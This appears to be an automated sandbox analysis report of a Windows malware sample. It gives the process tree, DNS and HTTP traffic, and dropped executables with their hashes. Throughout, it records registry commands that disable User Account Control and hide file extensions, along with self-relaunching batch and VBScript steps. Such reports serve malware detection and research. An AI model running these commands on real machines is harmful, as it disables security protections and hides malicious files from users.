C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eqwcggcg.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xaUUUAoY.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\PmIYEoEU.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DAAQEwYQ.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YqUIMIQA.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\aEcccoEg.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gOEcoMUQ.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MkwsUcgw.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jicAQMEE.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DQksYUMA.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vQckEAUQ.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jGYIogIs.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eowUUMEU.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QYcwYEAU.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ySsMwEsY.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\oGAUgUUE.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\sihclient.exe

C:\Windows\System32\sihclient.exe /cv 2iknc12XU0uMBxx69VbwGw.0.2

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 google.com udp
GB 172.217.169.46:80 google.com tcp
US 8.8.8.8:53 g.bing.com udp
GB 172.217.169.46:80 google.com tcp
US 150.171.27.10:443 g.bing.com tcp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 46.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 58.99.105.20.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 71.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
GB 172.217.169.46:80 google.com tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
GB 172.217.169.46:80 google.com tcp

Files

memory/4452-0-0x0000000000401000-0x0000000000476000-memory.dmp

C:\Users\Admin\bgMQIwoo\YUgQMkcI.exe

MD5 51cc0b1ecf4611bfd26930df02b170eb
SHA1 da67f5caee3653b1cff6b0059b11ef19623196a6
SHA256 3a2193945e6e4edb7abc83881ddfc1286d86bdbb03b936470e5216509dc2ca1c
SHA512 33d73c305069b5a33a7b2c4ea4c3935258a1505f810deb999ee9e31eef3ff75a20a8db1238f75dd6aeab77792d9b6da05b61912b736653c596a26ebea9b7fc7a

memory/3728-6-0x0000000000400000-0x000000000046E000-memory.dmp

C:\ProgramData\WCwgcgww\QuYEoUUs.exe

MD5 7d3b698ba3e7840e24fce6c17981bb1b
SHA1 114475bf403aac4f9c217da9b829f84836c963a4
SHA256 4fd6f26b39941694d92f0c9cb703111b1756ad808cad0020975b30ccbd63ce60
SHA512 7a35dd8a5d4deb0c125556447dd789799eda2feed7ec34e66713af714069b016035dadd26e46baf983ba6e8f38359c606d24de83170e6d3f4693f91def7a7999

memory/4476-14-0x0000000000400000-0x000000000046E000-memory.dmp

C:\ProgramData\uQMsEIoc\AMAkoQUc.exe

MD5 992221360cac6f989d55d00b79662f44
SHA1 688d34755767b4ec7ea6cace32cbcb19d4c61747
SHA256 251ca6508c4ee98ebd8a0d5f90958d5c48cb0e37eb05e7fef26c06022278dbc1
SHA512 a9153a7b3f76b1c0e08072e0b1393c969d7be42a11aeefd32ed2e54c6523ab0cd08b10f9b38833ce2cd1175646c9270182b12a61dbd3806189ea0189e43e880f

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

MD5 3b20f5e18b71fcd1d72cfc04349c721f
SHA1 3438a78d3c3b5a9c65a0f5f1d0110adda4d501f3
SHA256 8bf0705e02cfee4457efbaef3cc5f5aeb680d20dcbd7c8d893f386da85baafa4
SHA512 d7eed3b09ebcd4d9e9dacb4f306d5dea2283ac855242dbb66236547666a0699844a85b3edc21ef0b5313ad050465dd2b7184f8cf0b264b981fc85bdd455cde28

C:\Users\Admin\AppData\Local\Temp\ZckUMcco.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

C:\Users\Admin\AppData\Local\Temp\file.vbs

